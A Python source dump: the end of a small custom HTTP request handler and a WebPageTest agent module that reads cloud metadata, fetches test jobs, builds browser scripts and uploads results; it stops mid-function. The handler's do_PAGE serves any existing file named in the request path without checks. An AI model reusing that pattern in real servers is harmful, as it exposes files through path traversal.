self.log_message("REPLY DONE")
except Exception as ex:
traceback.print_exc()
self.server.log_error("Error sending: %s", str(ex))
def replyFile(self, path, num=200):
'''
Reply to the client with the given file.
'''
with open(path, "rb") as f:
block = f.read()
result = HtmlPage(block).html(self.uid)
self.reply(result)
def processCookies(self):
'''
Read in cookies and extract the session id.
'''
if self.server.useCookies:
self.cookies = SimpleCookie(self.headers.get('Cookie'))
if "UID" in self.cookies:
self.uid = self.cookies["UID"]
else:
self.uid = None
def do_GET(self):
'''
Called by parent to process GET requests. Forwards requests to do_PAGE.
'''
if not self.server._runmode: return
self.processCookies()
qry = urlparse(self.path)
req = dict(parse_qsl(qry.query))
self.server.log_message("GET %s %s", qry, req)
if "session" in req:
pageid = req["session"]
self.uid = HtmlPage.pageMap[pageid]
else:
self.uid = None
# self.setNewUID()
if qry.path == "/":
# result = self.server._getHome(self.uid)
c = self.getContext()
result = c.showHome()
if callable(result):
self.log_message("HOME CALL %s", result)
c.showPage(self, result, qry)
else:
self.log_message("HOME SEND %s", result)
self.reply(result)
elif qry.path == "/appscript.js":
self.reply(JSCRIPT)
else:
self.do_PAGE(qry)
def do_POST(self):
'''
Called by parent to process POST requests. Handles the built-in
/_process_srv0 request and forwards all others to do_PAGE.
'''
if not self.server._runmode: return
self.processCookies()
l = int(self.headers["Content-length"])
data = self.rfile.read(l)
self.log_message("HTTP POST %s", data)
if self.path == "/_process_srv0":
self.log_message("PROCESS %s", data)
req = json.loads(data)
c = self.getContext()
results = c.processCommand(req)
self.reply(results)
else:
self.do_PAGE(data)
def do_PAGE(self, qry):
'''
Process page requests that are not handled by the built-in endpoints.
'''
self.log_message("PAGE %s", qry)
if os.path.exists(qry.path[1:]):
# try to send a file with the given name if it exists.
self.replyFile(qry.path[1:])
else:
# otherwise, pass on the request to the Client object. It will
# execute a method with the same name if it exists.
c = self.getContext()
c.showPage(self, qry.path, qry)
def log_message(self, format, *args):
if self.server.verbose:
print(format % args)
|
webpagetest.py
|
# Copyright 2017 Google Inc. All rights reserved.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Main entry point for interfacing with WebPageTest server"""
from datetime import datetime
import gzip
import logging
import multiprocessing
import os
import platform
import re
import shutil
import socket
import subprocess
import threading
import time
import urllib
import zipfile
import psutil
import monotonic
import ujson as json
DEFAULT_JPEG_QUALITY = 30
class WebPageTest(object):
"""Controller for interfacing with the WebPageTest server"""
# pylint: disable=E0611
def __init__(self, options, workdir):
import requests
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
self.job = None
self.first_failure = None
self.session = requests.Session()
self.options = options
self.fps = options.fps
self.test_run_count = 0
self.log_formatter = logging.Formatter(fmt="%(asctime)s.%(msecs)03d - %(message)s",
datefmt="%H:%M:%S")
self.log_handler = None
# Configurable options
self.url = options.server
self.location = ''
self.test_locations = []
if options.location is not None:
self.test_locations = options.location.split(',')
self.location = str(self.test_locations[0])
self.key = options.key
self.time_limit = 120
self.cpu_scale_multiplier = None
# get the hostname or build one automatically if we are on a vmware system
# (specific MAC address range)
hostname = platform.uname()[1]
interfaces = psutil.net_if_addrs()
if interfaces is not None:
logging.debug('Interfaces:')
logging.debug(interfaces)
for interface in interfaces:
iface = interfaces[interface]
for addr in iface:
match = re.search(r'^00[\-:]50[\-:]56[\-:]00[\-:]'
r'([\da-fA-F]+)[\-:]([\da-fA-F]+)$', addr.address)
if match:
server = match.group(1)
machine = match.group(2)
hostname = 'VM{0}-{1}'.format(server, machine)
self.pc_name = hostname if options.name is None else options.name
self.auth_name = options.username
self.auth_password = options.password if options.password is not None else ''
self.validate_server_certificate = options.validcertificate
self.instance_id = None
self.zone = None
# Get the screen resolution if we're in desktop mode
self.screen_width = None
self.screen_height = None
if not self.options.android and not self.options.iOS:
if self.options.xvfb:
self.screen_width = 1920
self.screen_height = 1200
elif platform.system() == 'Windows':
try:
from win32api import GetSystemMetrics
self.screen_width = GetSystemMetrics(0)
self.screen_height = GetSystemMetrics(1)
except Exception:
pass
elif platform.system() == 'Darwin':
try:
from AppKit import NSScreen
self.screen_width = int(NSScreen.screens()[0].frame().size.width)
self.screen_height = int(NSScreen.screens()[0].frame().size.height)
except Exception:
pass
# See if we have to load dynamic config options
if self.options.ec2:
self.load_from_ec2()
elif self.options.gce:
self.load_from_gce()
# Set the session authentication options
if self.auth_name is not None:
self.session.auth = (self.auth_name, self.auth_password)
self.session.verify = self.validate_server_certificate
if options.cert is not None:
if options.certkey is not None:
self.session.cert = (options.cert, options.certkey)
else:
self.session.cert = options.cert
# Set up the temporary directories
self.workdir = os.path.join(workdir, self.pc_name)
self.persistent_dir = self.workdir + '.data'
self.profile_dir = os.path.join(self.workdir, 'browser')
if os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
# If we are running in a git clone, grab the date of the last
# commit as the version
self.version = '19.04'
try:
directory = os.path.abspath(os.path.dirname(__file__))
out = subprocess.check_output('git log -1 --format=%cd --date=raw',
shell=True, cwd=directory)
if out is not None:
matches = re.search(r'^(\d+)', out)
if matches:
timestamp = int(matches.group(1))
git_date = datetime.utcfromtimestamp(timestamp)
self.version = git_date.strftime('%y%m%d.%H%M%S')
except Exception:
pass
# Load the discovered browser margins
self.margins = {}
margins_file = os.path.join(self.persistent_dir, 'margins.json')
if os.path.isfile(margins_file):
with open(margins_file, 'rb') as f_in:
self.margins = json.load(f_in)
# Override the public webpagetest server automatically
if self.url is not None and self.url.find('www.webpagetest.org') >= 0:
self.url = 'http://agent.webpagetest.org/work/'
# pylint: enable=E0611
def benchmark_cpu(self):
"""Benchmark the CPU for mobile emulation"""
self.cpu_scale_multiplier = 1.0
if not self.options.android and not self.options.iOS:
import hashlib
logging.debug('Starting CPU benchmark')
hash_val = hashlib.sha256()
with open(__file__, 'rb') as f_in:
hash_data = f_in.read(4096)
start = monotonic.monotonic()
# 106k iterations take ~1 second on the reference machine
for _ in xrange(106000):
hash_val.update(hash_data)
elapsed = monotonic.monotonic() - start
self.cpu_scale_multiplier = 1.0 / elapsed
logging.debug('CPU Benchmark elapsed time: %0.3f, multiplier: %0.3f',
elapsed, self.cpu_scale_multiplier)
def get_persistent_dir(self):
"""Return the path to the persistent cache directory"""
return self.persistent_dir
def load_from_ec2(self):
"""Load config settings from EC2 user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
# The Windows AMI's use static routes which are not copied across regions.
# This sets them up before we attempt to access the metadata
if platform.system() == "Windows":
from .os_util import run_elevated
directory = os.path.abspath(os.path.dirname(__file__))
ec2_script = os.path.join(directory, 'support', 'ec2', 'win_routes.ps1')
run_elevated('powershell.exe', ec2_script)
# Make sure the route blocking isn't configured on Linux
if platform.system() == "Linux":
subprocess.call(['sudo', 'route', 'delete', '169.254.169.254'])
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/user-data',
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/meta-data/instance-id',
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/latest/meta-data/placement/availability-zone',
timeout=30, proxies=proxies)
if len(response.text):
self.zone = response.text.strip()
if not len(self.test_locations):
self.location = self.zone[:-1]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
# Block access to the metadata server
if platform.system() == "Linux":
subprocess.call(['sudo', 'route', 'add', '169.254.169.254', 'gw', '127.0.0.1', 'lo'])
def load_from_gce(self):
"""Load config settings from GCE user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/computeMetadata/v1/instance/attributes/wpt_data',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/computeMetadata/v1/instance/id',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
if not len(self.test_locations):
ok = False
while not ok:
try:
response = session.get('http://metadata.google.internal/computeMetadata/v1/instance/zone',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
zone = response.text.strip()
position = zone.rfind('/')
if position > -1:
zone = zone[position + 1:]
self.zone = zone
self.location = 'gce-' + self.zone[:-2]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
def parse_user_data(self, user_data):
"""Parse the provided user data and extract the config info"""
logging.debug("User Data: %s", user_data)
options = user_data.split()
for option in options:
try:
parts = option.split('=', 1)
if len(parts) == 2:
key = parts[0].strip()
value = parts[1].strip()
logging.debug('Setting config option "%s" to "%s"', key, value)
if key == 'wpt_server':
if re.search(r'^https?://', value):
self.url = value
if value.endswith('/'):
self.url += 'work/'
else:
self.url += '/work/'
else:
self.url = 'http://{0}/work/'.format(value)
if key == 'wpt_url':
self.url = value
elif key == 'wpt_loc' or key == 'wpt_location':
if value is not None:
self.test_locations = value.split(',')
self.location = str(self.test_locations[0])
if key == 'wpt_location':
append = []
for loc in self.test_locations:
append.append('{0}_wptdriver'.format(loc))
if len(append):
self.test_locations.extend(append)
elif key == 'wpt_key':
self.key = value
elif key == 'wpt_timeout':
self.time_limit = int(re.search(r'\d+', str(value)).group())
elif key == 'wpt_username':
self.auth_name = value
elif key == 'wpt_password':
self.auth_password = value
elif key == 'wpt_validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'wpt_fps':
self.fps = int(re.search(r'\d+', str(value)).group())
elif key == 'fps':
self.fps = int(re.search(r'\d+', str(value)).group())
except Exception:
pass
# pylint: disable=E1101
def get_uptime_minutes(self):
"""Get the system uptime in seconds"""
boot_time = None
try:
boot_time = psutil.boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.get_boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.BOOT_TIME
except Exception:
pass
uptime = None
if boot_time is not None and boot_time > 0:
uptime = int((time.time() - boot_time) / 60)
if uptime is not None and uptime < 0:
uptime = 0
return uptime
# pylint: enable=E1101
def reboot(self):
if platform.system() == 'Windows':
subprocess.call(['shutdown', '/r', '/f'])
else:
subprocess.call(['sudo', 'reboot'])
def get_test(self, browsers):
"""Get a job from the server"""
import requests
proxies = {"http": None, "https": None}
from .os_util import get_free_disk_space
if self.cpu_scale_multiplier is None:
self.benchmark_cpu()
if self.url is None:
return None
job = None
locations = list(self.test_locations) if len(self.test_locations) > 1 else [self.location]
location = str(locations.pop(0))
# Shuffle the list order
if len(self.test_locations) > 1:
self.test_locations.append(str(self.test_locations.pop(0)))
count = 0
retry = True
while count < 3 and retry:
retry = False
count += 1
url = self.url + "getwork.php?f=json&shards=1&reboot=1"
url += "&location=" + urllib.quote_plus(location)
url += "&pc=" + urllib.quote_plus(self.pc_name)
if self.key is not None:
url += "&key=" + urllib.quote_plus(self.key)
if self.instance_id is not None:
url += "&ec2=" + urllib.quote_plus(self.instance_id)
if self.zone is not None:
url += "&ec2zone=" + urllib.quote_plus(self.zone)
if self.options.android:
url += '&apk=1'
url += '&version={0}'.format(self.version)
if self.screen_width is not None:
url += '&screenwidth={0:d}'.format(self.screen_width)
if self.screen_height is not None:
url += '&screenheight={0:d}'.format(self.screen_height)
free_disk = get_free_disk_space()
url += '&freedisk={0:0.3f}'.format(free_disk)
uptime = self.get_uptime_minutes()
if uptime is not None:
url += '&upminutes={0:d}'.format(uptime)
if 'collectversion' in self.options and \
self.options.collectversion:
versions = []
for name in browsers.keys():
if 'version' in browsers[name]:
versions.append('{0}:{1}'.format(name, \
browsers[name]['version']))
browser_versions = ','.join(versions)
url += '&browsers=' + urllib.quote_plus(browser_versions)
logging.info("Checking for work: %s", url)
try:
response = self.session.get(url, timeout=30, proxies=proxies)
if self.options.alive:
with open(self.options.alive, 'a'):
os.utime(self.options.alive, None)
self.first_failure = None
if len(response.text):
if response.text == 'Reboot':
self.reboot()
return None
job = response.json()
logging.debug("Job: %s", json.dumps(job))
# set some default options
job['agent_version'] = self.version
if 'imageQuality' not in job:
job['imageQuality'] = DEFAULT_JPEG_QUALITY
if 'pngScreenShot' not in job:
job['pngScreenShot'] = 0
if 'fvonly' not in job:
job['fvonly'] = 0
if 'width' not in job:
job['width'] = 1024
if 'height' not in job:
job['height'] = 768
if 'browser_width' in job:
job['width'] = job['browser_width']
if 'browser_height' in job:
job['height'] = job['browser_height']
if 'timeout' not in job:
job['timeout'] = self.time_limit
if 'noscript' not in job:
job['noscript'] = 0
if 'Test ID' not in job or 'browser' not in job or 'runs' not in job:
job = None
if 'type' not in job:
job['type'] = ''
if job['type'] == 'traceroute':
job['fvonly'] = 1
if 'fps' not in job:
job['fps'] = self.fps
if 'warmup' not in job:
job['warmup'] = 0
if job['type'] == 'lighthouse':
job['fvonly'] = 1
job['lighthouse'] = 1
job['keep_lighthouse_trace'] = \
bool('lighthouseTrace' in job and job['lighthouseTrace'])
job['lighthouse_throttle'] = \
bool('lighthouseThrottle' in job and job['lighthouseThrottle'])
job['video'] = bool('Capture Video' in job and job['Capture Video'])
job['keepvideo'] = bool('keepvideo' in job and job['keepvideo'])
job['disable_video'] = bool(not job['video'] and
'disable_video' in job and
job['disable_video'])
job['interface'] = None
job['persistent_dir'] = self.persistent_dir
if 'throttle_cpu' in job:
throttle = float(re.search(r'\d+\.?\d*', str(job['throttle_cpu'])).group())
if 'bypass_cpu_normalization' not in job or not job['bypass_cpu_normalization']:
throttle *= self.cpu_scale_multiplier
job['throttle_cpu_requested'] = job['throttle_cpu']
job['throttle_cpu'] = throttle
if job is None and len(locations) > 0:
location = str(locations.pop(0))
retry = True
except requests.exceptions.RequestException as err:
logging.critical("Get Work Error: %s", err.strerror)
retry = True
now = monotonic.monotonic()
if self.first_failure is None:
self.first_failure = now
# Reboot if we haven't been able to reach the server for 30 minutes
elapsed = now - self.first_failure
if elapsed > 1800:
self.reboot()
time.sleep(0.1)
except Exception:
pass
self.job = job
return job
def get_task(self, job):
"""Create a task object for the next test run or return None if the job is done"""
task = None
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'current_state' not in job or not job['current_state']['done']:
if 'run' in job:
# Sharded test, running one run only
if 'current_state' not in job:
job['current_state'] = {"run": int(re.search(r'\d+', str(job['run'])).group()),
"repeat_view": False,
"done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
return task
elif 'current_state' not in job:
job['current_state'] = {"run": 1, "repeat_view": False, "done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
if job['warmup'] > 0:
job['warmup'] -= 1
else:
job['current_state']['run'] += 1
job['current_state']['repeat_view'] = False
if job['current_state']['run'] <= job['runs']:
test_id = job['Test ID']
run = job['current_state']['run']
profile_dir = '{0}.{1}.{2:d}'.format(self.profile_dir, test_id, run)
task = {'id': test_id,
'run': run,
'cached': 1 if job['current_state']['repeat_view'] else 0,
'done': False,
'profile': profile_dir,
'error': None,
'log_data': True,
'activity_time': 2,
'combine_steps': False,
'video_directories': [],
'page_data': {},
'navigated': False,
'page_result': None,
'script_step_count': 1}
# Set up the task configuration options
task['port'] = 9222 + (self.test_run_count % 500)
task['task_prefix'] = "{0:d}".format(run)
if task['cached']:
task['task_prefix'] += "_Cached"
task['prefix'] = task['task_prefix']
short_id = "{0}.{1}.{2}".format(task['id'], run, task['cached'])
task['dir'] = os.path.join(self.workdir, short_id)
task['task_video_prefix'] = 'video_{0:d}'.format(run)
if task['cached']:
task['task_video_prefix'] += "_cached"
task['video_subdirectory'] = task['task_video_prefix']
if os.path.isdir(task['dir']):
shutil.rmtree(task['dir'])
os.makedirs(task['dir'])
if not os.path.isdir(profile_dir):
os.makedirs(profile_dir)
if job['current_state']['run'] == job['runs'] or 'run' in job:
if job['current_state']['repeat_view']:
job['current_state']['done'] = True
task['done'] = True
elif 'fvonly' in job and job['fvonly']:
job['current_state']['done'] = True
task['done'] = True
if 'debug' in job and job['debug']:
task['debug_log'] = os.path.join(task['dir'], task['prefix'] + '_debug.log')
try:
self.log_handler = logging.FileHandler(task['debug_log'])
self.log_handler.setFormatter(self.log_formatter)
logging.getLogger().addHandler(self.log_handler)
except Exception:
pass
if 'keepua' not in job or not job['keepua']:
task['AppendUA'] = 'PTST'
if 'UAModifier' in job:
task['AppendUA'] = job['UAModifier']
task['AppendUA'] += '/{0}'.format(self.version)
if 'AppendUA' in job:
if 'AppendUA' in task:
task['AppendUA'] += ' ' + job['AppendUA']
else:
task['AppendUA'] = job['AppendUA']
if 'AppendUA' in task:
task['AppendUA'] = task['AppendUA'].replace('%TESTID%', test_id)\
.replace('%RUN%', str(run))\
.replace('%CACHED%', str(task['cached']))\
.replace('%VERSION%', self.version)
task['block'] = []
if 'block' in job:
block_list = job['block'].split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
if 'blockDomains' in job:
if 'host_rules' not in task:
task['host_rules'] = []
if 'block_domains' not in task:
task['block_domains'] = []
domains = re.split('[, ]', job['blockDomains'])
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
self.build_script(job, task)
task['width'] = job['width']
task['height'] = job['height']
if 'mobile' in job and job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
task['width'] = \
job['width'] + max(self.margins[job['browser']]['width'], 0)
task['height'] = \
job['height'] + max(self.margins[job['browser']]['height'], 0)
else:
task['width'] = job['width'] + 20
task['height'] = job['height'] + 120
task['time_limit'] = job['timeout']
task['test_time_limit'] = task['time_limit'] * task['script_step_count']
task['stop_at_onload'] = bool('web10' in job and job['web10'])
task['run_start_time'] = monotonic.monotonic()
# Keep the full resolution video frames if the browser window is smaller than 600px
if 'thumbsize' not in job and (task['width'] < 600 or task['height'] < 600):
job['fullSizeVideo'] = 1
self.test_run_count += 1
if task is None and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
return task
def running_another_test(self, task):
"""Increment the port for Chrome and the run count"""
task['port'] = 9222 + (self.test_run_count % 500)
self.test_run_count += 1
def build_script(self, job, task):
"""Build the actual script that will be used for testing"""
task['script'] = []
record_count = 0
# Add script commands for any static options that need them
if 'script' in job:
lines = job['script'].splitlines()
for line in lines:
parts = line.split("\t", 2)
if parts is not None and len(parts):
keep = True
record = False
command = parts[0].lower().strip()
target = parts[1].strip() if len(parts) > 1 else None
value = parts[2].strip() if len(parts) > 2 else None
andwait = command.find('andwait')
if andwait > -1:
command = command[:andwait]
record = True
# go through the known commands
if command == 'navigate':
if target is not None and target[:4] != 'http':
target = 'http://' + target
job['url'] = target
record = True
elif command == 'addheader' or command == 'setheader':
if target is not None and len(target):
separator = target.find(':')
if separator > 0:
name = target[:separator].strip()
header_value = target[separator + 1:].strip()
if 'headers' not in task:
task['headers'] = {}
task['headers'][name] = header_value
elif command == 'overridehost':
if target and value:
if 'overrideHosts' not in task:
task['overrideHosts'] = {}
task['overrideHosts'][target] = value
elif command == 'setcookie' and target is not None and value is not None:
url = target
cookie = value
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
cookie_name = cookie[:pos].strip()
cookie_value = cookie[pos + 1:].strip()
if len(cookie_name) and len(cookie_value) and len(url):
if 'cookies' not in task:
task['cookies'] = []
task['cookies'].append({'url': url,
'name': cookie_name,
'value': cookie_value})
# commands that get pre-processed
elif command == 'setuseragent' and target is not None:
job['uastring'] = target
elif command == 'setbrowsersize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
dpr = float(job['dpr']) if 'dpr' in job else 1.0
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = int(float(width) / dpr)
job['height'] = int(float(height) / dpr)
elif command == 'setviewportsize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = width
job['height'] = height
# Adjust the viewport for non-mobile tests
if 'mobile' not in job or not job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
job['width'] += \
max(self.margins[job['browser']]['width'], 0)
job['height'] += \
max(self.margins[job['browser']]['height'], 0)
else:
job['adjust_viewport'] = True
elif command == 'setdevicescalefactor' and target is not None:
keep = False
job['dpr'] = target
elif command == 'settimeout':
keep = False
if target is not None:
time_limit = int(re.search(r'\d+', str(target)).group())
if time_limit > 0 and time_limit < 1200:
job['timeout'] = time_limit
elif command == 'blockdomains':
keep = False
if target is not None:
if 'block_domains' not in task:
task['block_domains'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = re.split('[, ]', target)
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
elif command == 'blockdomainsexcept':
keep = False
if target is not None:
if 'block_domains_except' not in task:
task['block_domains_except'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = target.split()
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains_except'].append(domain)
task['host_rules'].append(
'"MAP * 127.0.0.1, EXCLUDE {0}"'.format(domain))
elif command == 'block':
keep = False
if target is not None:
block_list = target.split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
elif command == 'setdns':
keep = False
if target is not None and value is not None and len(target) and len(value):
if target.find('"') == -1 and value.find('"') == -1:
if 'dns_override' not in task:
task['dns_override'] = []
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, value))
if re.match(r'^\d+\.\d+\.\d+\.\d+$', value) and \
re.match(r'^[a-zA-Z0-9\-\.]+$', target):
task['dns_override'].append([target, value])
elif command == 'setdnsname':
# Resolve the IP and treat it like a setdns command
keep = False
if target is not None and value is not None and len(target) and len(value):
addr = None
try:
result = socket.getaddrinfo(value, 80)
if result and len(result) > 0:
for entry in result:
if entry and len(entry) >= 5:
sockaddr = entry[4]
if sockaddr and len(sockaddr) >= 1:
addr = sockaddr[0]
break
except Exception:
pass
if addr is not None and target.find('"') == -1:
if 'dns_override' not in task:
task['dns_override'] = []
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, addr))
if re.match(r'^\d+\.\d+\.\d+\.\d+$', addr) and \
re.match(r'^[a-zA-Z0-9\-\.]+$', target):
task['dns_override'].append([target, addr])
# Commands that get translated into exec commands
elif command in ['click', 'selectvalue', 'sendclick', 'setinnerhtml',
'setinnertext', 'setvalue', 'submitform']:
if target is not None:
# convert the selector into a querySelector
separator = target.find('=')
if separator == -1:
separator = target.find("'")
if separator >= 0:
attribute = target[:separator]
attr_value = target[separator + 1:]
script = "document.querySelector('[{0}=\"{1}\"]')".format(
attribute, attr_value)
if command in ['click', 'sendclick']:
script += '.click();'
elif command == 'submitform' and attr_value is not None:
script += '.submit();'
record = True
elif command in ['setvalue', 'selectvalue'] and value is not None:
script += '.value="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnertext' and value is not None:
script += '.innerText="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnerhtml' and value is not None:
script += '.innerHTML="{0}";'.format(value.replace('"', '\\"'))
command = 'exec'
target = script
value = None
if keep:
if record:
record_count += 1
task['script'].append({'command': command,
'target': target,
'value': value,
'record': record})
elif 'url' in job:
if job['url'][:4] != 'http':
job['url'] = 'http://' + job['url']
record_count += 1
task['script'].append({'command': 'navigate', 'target': job['url'], 'record': True})
# Remove any spurious commands from the end of the script
pos = len(task['script']) - 1
while pos > 0:
if task['script'][pos]['record']:
break
task['script'].pop(pos)
pos -= 1
task['script_step_count'] = max(record_count, 1)
logging.debug(task['script'])
def update_browser_viewport(self, task):
"""Update the browser border size based on the measured viewport"""
if 'actual_viewport' in task and 'width' in task and 'height' in task and \
self.job is not None and 'browser' in self.job:
browser = self.job['browser']
width = max(task['width'] - task['actual_viewport']['width'], 0)
height = max(task['height'] - task['actual_viewport']['height'], 0)
if browser not in self.margins or self.margins[browser]['width'] != width or \
self.margins[browser]['height'] != height:
self.margins[browser] = {"width": width, "height": height}
if not os.path.isdir(self.persistent_dir):
os.makedirs(self.persistent_dir)
margins_file = os.path.join(self.persistent_dir, 'margins.json')
with open(margins_file, 'wb') as f_out:
json.dump(self.margins, f_out)
def body_fetch_thread(self):
"""background thread to fetch bodies"""
import requests
session = requests.session()
proxies = {"http": None, "https": None}
try:
while True:
task = self.fetch_queue.get_nowait()
try:
url = task['url']
dest = task['file']
headers = {}
if isinstance(task['headers'], list):
for header in task['headers']:
separator = header.find(':', 2)
if separator >= 0:
header_name = header[:separator].strip()
value = header[separator + 1:].strip()
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
elif isinstance(task['headers'], dict):
for header_name in task['headers']:
value = task['headers'][header_name]
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
logging.debug('Downloading %s to %s', url, dest)
response = session.get(url, headers=headers, stream=True,
timeout=30, proxies=proxies)
if response.status_code == 200:
with open(dest, 'wb') as f_out:
for chunk in response.iter_content(chunk_size=4096):
f_out.write(chunk)
self.fetch_result_queue.put(task)
except Exception:
pass
self.fetch_queue.task_done()
except Exception:
pass
def get_bodies(self, task):
"""Fetch any bodies that are missing if response bodies were requested"""
all_bodies = False
html_body = False
if 'bodies' in self.job and self.job['bodies']:
all_bodies = True
if 'htmlbody' in self.job and self.job['htmlbody']:
html_body = True
if not all_bodies and not html_body:
return
try:
path_base = os.path.join(task['dir'], task['prefix'])
path = os.path.join(task['dir'], 'bodies')
requests = []
devtools_file = os.path.join(task['dir'], task['prefix'] + '_devtools_requests.json.gz')
with gzip.open(devtools_file, 'rb') as f_in:
requests = json.load(f_in)
count = 0
bodies_zip = path_base + '_bodies.zip'
if requests and 'requests' in requests:
# See what bodies are already in the zip file
body_index = 0
bodies = []
try:
with zipfile.ZipFile(bodies_zip, 'r') as zip_file:
files = zip_file.namelist()
for filename in files:
matches = re.match(r'^(\d\d\d)-(.*)-body.txt$', filename)
if matches:
index = int(matches.group(1))
request_id = str(matches.group(2))
if index > body_index:
body_index = index
bodies.append(request_id)
except Exception:
pass
for request in requests['requests']:
if 'full_url' in request and \
'responseCode' in request \
and request['responseCode'] == 200 and \
request['full_url'].find('ocsp') == -1 and\
request['full_url'].find('.woff') == -1 and\
request['full_url'].find('.ttf') == -1 and\
'contentType' in request:
content_type = request['contentType'].lower()
need_body = False
if all_bodies:
if content_type.startswith('text/html') or \
content_type.find('javascript') >= 0 or \
content_type.find('json') >= 0:
need_body = True
elif html_body and content_type.startswith('text/html'):
need_body = True
html_body = False
if need_body:
body_id = str(request['id'])
if 'raw_id' in request:
body_id = str(request['raw_id'])
if body_id not in bodies:
count += 1
body_file_path = os.path.join(path, str(body_id))
headers = None
if 'headers' in request and 'request' in request['headers']:
headers = request['headers']['request']
task = {'url': request['full_url'],
'file': body_file_path,
'id': body_id,
'headers': headers}
if os.path.isfile(body_file_path):
self.fetch_result_queue.put(task)
else:
self.fetch_queue.put(task)
if count:
if not os.path.isdir(path):
os.makedirs(path)
logging.debug("Fetching bodies for %d requests", count)
threads = []
thread_count = min(count, 10)
for _ in xrange(thread_count):
thread = threading.Thread(target=self.body_fetch_thread)
thread.daemon = True
thread.start()
threads.append(thread)
for thread in threads:
thread.join(timeout=120)
# Build a list of files to add to the zip archive
bodies = []
try:
while True:
task = self.fetch_result_queue.get_nowait()
if os.path.isfile(task['file']):
# check to see if it is text or utf-8 data
try:
data = ''
with open(task['file'], 'rb') as f_in:
data = f_in.read()
json.loads('"' + data.replace('"', '\\"') + '"')
body_index += 1
file_name = '{0:03d}-{1}-body.txt'.format(body_index, task['id'])
bodies.append({'name': file_name, 'file': task['file']})
except Exception:
pass
self.fetch_result_queue.task_done()
except Exception:
pass
# Add the files
if bodies:
with zipfile.ZipFile(bodies_zip, 'a', zipfile.ZIP_DEFLATED) as zip_file:
for body in bodies:
zip_file.write(body['file'], body['name'])
except Exception:
pass
def upload_task_result(self, task):
"""Upload the result of an individual test run"""
logging.info('Uploading result')
cpu_pct = None
self.update_browser_viewport(task)
# Stop logging to the file
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'debug_log' in task and os.path.isfile(task['debug_log']):
debug_out = task['debug_log'] + '.gz'
with open(task['debug_log'], 'rb') as f_in:
with gzip.open(debug_out, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(task['debug_log'])
except Exception:
pass
if self.job['warmup'] > 0:
logging.debug('Discarding warmup run')
else:
if 'page_data' in task and 'fullyLoadedCPUpct' in task['page_data']:
cpu_pct = task['page_data']['fullyLoadedCPUpct']
data = {'id': task['id'],
'location': self.location,
'run': str(task['run']),
'cached': str(task['cached']),
'pc': self.pc_name}
